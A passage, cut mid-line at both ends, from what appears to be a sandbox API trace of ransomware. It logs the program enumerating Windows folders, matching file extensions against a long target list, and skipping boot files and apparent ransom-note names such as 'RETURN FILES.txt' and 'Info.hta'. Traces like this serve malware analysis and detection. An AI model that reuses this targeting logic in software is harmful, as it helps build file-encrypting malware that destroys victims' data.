returned 4 [0195.779] lstrcmpiW (lpString1=".eps", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".epsf") returned 5 [0195.779] lstrcmpiW (lpString1=".epsf", lpString2="6.log") returned -1 [0195.779] lstrlenW (lpString=".epsp") returned 5 [0195.779] lstrcmpiW (lpString1=".epsp", lpString2="6.log") returned -1 [0195.779] lstrlenW (lpString=".erf") returned 4 [0195.779] lstrcmpiW (lpString1=".erf", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".exr") returned 4 [0195.779] lstrcmpiW (lpString1=".exr", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".f4v") returned 4 [0195.779] lstrcmpiW (lpString1=".f4v", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".fido") returned 5 [0195.779] lstrcmpiW (lpString1=".fido", lpString2="6.log") returned -1 [0195.779] lstrlenW (lpString=".flm") returned 4 [0195.779] lstrcmpiW (lpString1=".flm", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".flv") returned 4 [0195.779] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".frm") returned 4 [0195.779] lstrcmpiW (lpString1=".frm", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".fxg") returned 4 [0195.779] lstrcmpiW (lpString1=".fxg", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".geo") returned 4 [0195.779] lstrcmpiW (lpString1=".geo", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".gif") returned 4 [0195.779] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".grs") returned 4 [0195.779] lstrcmpiW (lpString1=".grs", lpString2=".log") returned -1 [0195.779] lstrlenW (lpString=".gz") returned 3 [0195.779] lstrcmpiW (lpString1=".gz", lpString2="log") returned -1 [0195.779] lstrlenW (lpString=".h") returned 2 [0195.780] lstrcmpiW (lpString1=".h", lpString2="og") returned -1 [0195.780] lstrlenW (lpString=".hdr") returned 4 [0195.780] lstrcmpiW (lpString1=".hdr", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".hpp") returned 4 [0195.780] lstrcmpiW (lpString1=".hpp", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".hta") returned 4 [0195.780] lstrcmpiW (lpString1=".hta", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".htc") returned 4 [0195.780] lstrcmpiW (lpString1=".htc", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".htm") returned 4 [0195.780] lstrcmpiW (lpString1=".htm", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".html") returned 5 [0195.780] lstrcmpiW (lpString1=".html", lpString2="6.log") returned -1 [0195.780] lstrlenW (lpString=".icb") returned 4 [0195.780] lstrcmpiW (lpString1=".icb", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".ics") returned 4 [0195.780] lstrcmpiW (lpString1=".ics", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".iff") returned 4 [0195.780] lstrcmpiW (lpString1=".iff", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".inc") returned 4 [0195.780] lstrcmpiW (lpString1=".inc", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".indd") returned 5 [0195.780] lstrcmpiW (lpString1=".indd", lpString2="6.log") returned -1 [0195.780] lstrlenW (lpString=".ini") returned 4 [0195.780] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".iqy") returned 4 [0195.780] lstrcmpiW (lpString1=".iqy", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".j2c") returned 4 [0195.780] lstrcmpiW (lpString1=".j2c", lpString2=".log") returned -1 [0195.780] lstrlenW (lpString=".j2k") returned 4 [0195.781] lstrcmpiW (lpString1=".j2k", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".java") returned 5 [0195.781] lstrcmpiW (lpString1=".java", lpString2="6.log") returned -1 [0195.781] lstrlenW (lpString=".jp2") returned 4 [0195.781] lstrcmpiW (lpString1=".jp2", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".jpc") returned 4 [0195.781] lstrcmpiW (lpString1=".jpc", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".jpe") returned 4 [0195.781] lstrcmpiW (lpString1=".jpe", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".jpeg") returned 5 [0195.781] lstrcmpiW (lpString1=".jpeg", lpString2="6.log") returned -1 [0195.781] lstrlenW (lpString=".jpf") returned 4 [0195.781] lstrcmpiW (lpString1=".jpf", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".jpg") returned 4 [0195.781] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".jpx") returned 4 [0195.781] lstrcmpiW (lpString1=".jpx", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".js") returned 3 [0195.781] lstrcmpiW (lpString1=".js", lpString2="log") returned -1 [0195.781] lstrlenW (lpString=".jsf") returned 4 [0195.781] lstrcmpiW (lpString1=".jsf", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".json") returned 5 [0195.781] lstrcmpiW (lpString1=".json", lpString2="6.log") returned -1 [0195.781] lstrlenW (lpString=".jsp") returned 4 [0195.781] lstrcmpiW (lpString1=".jsp", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".kdc") returned 4 [0195.781] lstrcmpiW (lpString1=".kdc", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".kmz") returned 4 [0195.781] lstrcmpiW (lpString1=".kmz", lpString2=".log") returned -1 [0195.781] lstrlenW (lpString=".kwm") returned 4 [0195.782] lstrcmpiW (lpString1=".kwm", lpString2=".log") returned -1 [0195.782] lstrlenW (lpString=".lasso") returned 6 [0195.782] lstrcmpiW (lpString1=".lasso", lpString2="66.log") returned -1 [0195.782] lstrlenW (lpString=".lbi") returned 4 [0195.782] lstrcmpiW (lpString1=".lbi", lpString2=".log") returned -1 [0195.782] lstrlenW (lpString=".lgf") returned 4 [0195.782] lstrcmpiW (lpString1=".lgf", lpString2=".log") returned -1 [0195.782] lstrlenW (lpString=".lgp") returned 4 [0195.782] lstrcmpiW (lpString1=".lgp", lpString2=".log") returned -1 [0195.782] lstrlenW (lpString=".log") returned 4 [0195.782] lstrcmpiW (lpString1=".log", lpString2=".log") returned 0 [0195.782] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0195.782] lstrlenW (lpString=".jack") returned 5 [0195.782] lstrcmpiW (lpString1=".jack", lpString2="6.log") returned -1 [0195.782] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0195.782] lstrcmpiW (lpString1="boot.ini", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned -1 [0195.782] lstrcmpiW (lpString1="bootfont.bin", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned -1 [0195.782] lstrcmpiW (lpString1="ntldr", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0195.782] lstrcmpiW (lpString1="ntdetect.com", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0195.782] lstrcmpiW (lpString1="io.sys", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0195.782] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0195.782] lstrcmpiW (lpString1="Info.hta", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0195.782] lstrcmpiW (lpString1="Pg.exe", lpString2="downlevel_2017_09_07_02_02_39_766.log") returned 1 [0195.782] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0195.782] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0195.783] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0195.783] lstrlenW (lpString=".1cd") returned 4 [0195.783] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0195.783] lstrlenW (lpString=".3ds") returned 4 [0195.783] lstrcmpiW (lpString1=".3ds", lpString2=".log") returned -1 [0195.783] lstrlenW (lpString=".3fr") returned 4 [0195.783] lstrcmpiW (lpString1=".3fr", lpString2=".log") returned -1 [0195.783] lstrlenW (lpString=".3g2") returned 4 [0195.783] lstrcmpiW (lpString1=".3g2", lpString2=".log") returned -1 [0195.783] lstrlenW (lpString=".3gp") returned 4 [0195.783] lstrcmpiW (lpString1=".3gp", lpString2=".log") returned -1 [0195.783] lstrlenW (lpString=".7z") returned 3 [0195.783] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0195.783] lstrlenW (lpString=".accda") returned 6 [0195.783] lstrcmpiW (lpString1=".accda", lpString2="37.log") returned -1 [0195.783] lstrlenW (lpString=".accdb") returned 6 [0195.783] lstrcmpiW (lpString1=".accdb", lpString2="37.log") returned -1 [0195.783] lstrlenW (lpString=".accdc") returned 6 [0195.783] lstrcmpiW (lpString1=".accdc", lpString2="37.log") returned -1 [0195.783] lstrlenW (lpString=".accde") returned 6 [0195.783] lstrcmpiW (lpString1=".accde", lpString2="37.log") returned -1 [0195.783] lstrlenW (lpString=".accdt") returned 6 [0195.783] lstrcmpiW (lpString1=".accdt", lpString2="37.log") returned -1 [0195.783] lstrlenW (lpString=".accdw") returned 6 [0195.783] lstrcmpiW (lpString1=".accdw", lpString2="37.log") returned -1 [0195.783] lstrlenW (lpString=".adb") returned 4 [0195.783] lstrcmpiW (lpString1=".adb", lpString2=".log") returned -1 [0195.783] lstrlenW (lpString=".adp") returned 4 [0195.784] lstrcmpiW (lpString1=".adp", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".ai") returned 3 [0195.784] lstrcmpiW (lpString1=".ai", lpString2="log") returned -1 [0195.784] lstrlenW (lpString=".ai3") returned 4 [0195.784] lstrcmpiW (lpString1=".ai3", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".ai4") returned 4 [0195.784] lstrcmpiW (lpString1=".ai4", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".ai5") returned 4 [0195.784] lstrcmpiW (lpString1=".ai5", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".ai6") returned 4 [0195.784] lstrcmpiW (lpString1=".ai6", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".ai7") returned 4 [0195.784] lstrcmpiW (lpString1=".ai7", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".ai8") returned 4 [0195.784] lstrcmpiW (lpString1=".ai8", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".anim") returned 5 [0195.784] lstrcmpiW (lpString1=".anim", lpString2="7.log") returned -1 [0195.784] lstrlenW (lpString=".arw") returned 4 [0195.784] lstrcmpiW (lpString1=".arw", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".as") returned 3 [0195.784] lstrcmpiW (lpString1=".as", lpString2="log") returned -1 [0195.784] lstrlenW (lpString=".asa") returned 4 [0195.784] lstrcmpiW (lpString1=".asa", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".asc") returned 4 [0195.784] lstrcmpiW (lpString1=".asc", lpString2=".log") returned -1 [0195.784] lstrlenW (lpString=".ascx") returned 5 [0195.784] lstrcmpiW (lpString1=".ascx", lpString2="7.log") returned -1 [0195.784] lstrlenW (lpString=".asm") returned 4 [0195.784] lstrcmpiW (lpString1=".asm", lpString2=".log") returned -1 [0195.785] lstrlenW (lpString=".asmx") returned 5 [0195.785] lstrcmpiW (lpString1=".asmx", lpString2="7.log") returned -1 [0195.785] lstrlenW (lpString=".asp") returned 4 [0195.785] lstrcmpiW (lpString1=".asp", lpString2=".log") returned -1 [0195.785] lstrlenW (lpString=".aspx") returned 5 [0195.785] lstrcmpiW (lpString1=".aspx", lpString2="7.log") returned -1 [0195.785] lstrlenW (lpString=".asr") returned 4 [0195.785] lstrcmpiW (lpString1=".asr", lpString2=".log") returned -1 [0195.785] lstrlenW (lpString=".asx") returned 4 [0195.785] lstrcmpiW (lpString1=".asx", lpString2=".log") returned -1 [0195.785] lstrlenW (lpString=".avi") returned 4 [0195.787] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0195.787] lstrlenW (lpString=".avs") returned 4 [0195.787] lstrcmpiW (lpString1=".avs", lpString2=".log") returned -1 [0195.787] lstrlenW (lpString=".backup") returned 7 [0195.787] lstrcmpiW (lpString1=".backup", lpString2="737.log") returned -1 [0195.787] lstrlenW (lpString=".bak") returned 4 [0195.787] lstrcmpiW (lpString1=".bak", lpString2=".log") returned -1 [0195.787] lstrlenW (lpString=".bay") returned 4 [0195.787] lstrcmpiW (lpString1=".bay", lpString2=".log") returned -1 [0195.787] lstrlenW (lpString=".bd") returned 3 [0195.787] lstrcmpiW (lpString1=".bd", lpString2="log") returned -1 [0195.787] lstrlenW (lpString=".bin") returned 4 [0195.787] lstrcmpiW (lpString1=".bin", lpString2=".log") returned -1 [0195.787] lstrlenW (lpString=".bmp") returned 4 [0195.787] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0195.787] lstrlenW (lpString=".bz2") returned 4 [0195.787] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0195.787] lstrlenW (lpString=".c") returned 2 [0195.787] lstrcmpiW (lpString1=".c", lpString2="og") returned -1 [0195.788] lstrlenW (lpString=".cdr") returned 4 [0195.788] lstrcmpiW (lpString1=".cdr", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".cer") returned 4 [0195.788] lstrcmpiW (lpString1=".cer", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".cf") returned 3 [0195.788] lstrcmpiW (lpString1=".cf", lpString2="log") returned -1 [0195.788] lstrlenW (lpString=".cfc") returned 4 [0195.788] lstrcmpiW (lpString1=".cfc", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".cfm") returned 4 [0195.788] lstrcmpiW (lpString1=".cfm", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".cfml") returned 5 [0195.788] lstrcmpiW (lpString1=".cfml", lpString2="7.log") returned -1 [0195.788] lstrlenW (lpString=".cfu") returned 4 [0195.788] lstrcmpiW (lpString1=".cfu", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".chm") returned 4 [0195.788] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".cin") returned 4 [0195.788] lstrcmpiW (lpString1=".cin", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".class") returned 6 [0195.788] lstrcmpiW (lpString1=".class", lpString2="37.log") returned -1 [0195.788] lstrlenW (lpString=".clx") returned 4 [0195.788] lstrcmpiW (lpString1=".clx", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".config") returned 7 [0195.788] lstrcmpiW (lpString1=".config", lpString2="737.log") returned -1 [0195.788] lstrlenW (lpString=".cpp") returned 4 [0195.788] lstrcmpiW (lpString1=".cpp", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".cr2") returned 4 [0195.788] lstrcmpiW (lpString1=".cr2", lpString2=".log") returned -1 [0195.788] lstrlenW (lpString=".crt") returned 4 [0195.789] lstrcmpiW (lpString1=".crt", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".crw") returned 4 [0195.789] lstrcmpiW (lpString1=".crw", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".cs") returned 3 [0195.789] lstrcmpiW (lpString1=".cs", lpString2="log") returned -1 [0195.789] lstrlenW (lpString=".css") returned 4 [0195.789] lstrcmpiW (lpString1=".css", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".csv") returned 4 [0195.789] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".cub") returned 4 [0195.789] lstrcmpiW (lpString1=".cub", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".dae") returned 4 [0195.789] lstrcmpiW (lpString1=".dae", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".dat") returned 4 [0195.789] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".db") returned 3 [0195.789] lstrcmpiW (lpString1=".db", lpString2="log") returned -1 [0195.789] lstrlenW (lpString=".dbf") returned 4 [0195.789] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".dbx") returned 4 [0195.789] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".dc3") returned 4 [0195.789] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".dcm") returned 4 [0195.789] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".dcr") returned 4 [0195.789] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".der") returned 4 [0195.789] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0195.789] lstrlenW (lpString=".dib") returned 4 [0195.790] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0195.790] lstrlenW (lpString=".dic") returned 4 [0195.790] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0195.790] lstrlenW (lpString=".dif") returned 4 [0195.790] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0195.790] lstrlenW (lpString=".divx") returned 5 [0195.790] lstrcmpiW (lpString1=".divx", lpString2="7.log") returned -1 [0195.790] lstrlenW (lpString=".djvu") returned 5 [0195.790] lstrcmpiW (lpString1=".djvu", lpString2="7.log") returned -1 [0195.790] lstrlenW (lpString=".dng") returned 4 [0195.790] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0195.790] lstrlenW (lpString=".doc") returned 4 [0195.790] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0195.790] lstrlenW (lpString=".docm") returned 5 [0195.790] lstrcmpiW (lpString1=".docm", lpString2="7.log") returned -1 [0195.790] lstrlenW (lpString=".docx") returned 5 [0195.790] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0195.790] lstrlenW (lpString=".dot") returned 4 [0195.790] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0195.790] lstrlenW (lpString=".dotm") returned 5 [0195.790] lstrcmpiW (lpString1=".dotm", lpString2="7.log") returned -1 [0195.790] lstrlenW (lpString=".dotx") returned 5 [0195.790] lstrcmpiW (lpString1=".dotx", lpString2="7.log") returned -1 [0195.790] lstrlenW (lpString=".dpx") returned 4 [0195.790] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0195.790] lstrlenW (lpString=".dqy") returned 4 [0195.790] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0195.790] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0195.791] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0195.791] FindClose (in: hFindFile=0x604378 | out: hFindFile=0x604378) returned 1 [0195.792] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.792] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0195.792] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604878 [0195.792] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.792] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0195.792] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0195.793] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0195.793] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0195.793] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0195.793] FindNextFileW (in: hFindFile=0x604878, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0195.793] FindClose (in: hFindFile=0x604878 | out: hFindFile=0x604878) returned 1 [0195.794] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.794] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0195.794] FindClose (in: hFindFile=0x604738 | out: hFindFile=0x604738) returned 1 [0195.794] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4011288 | out: hHeap=0x5e0000) returned 1 [0195.794] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0195.795] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x604378 [0195.795] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0195.795] FindNextFileW (in: hFindFile=0x604378, lpFindFileData=0x3cdfa7c | out: 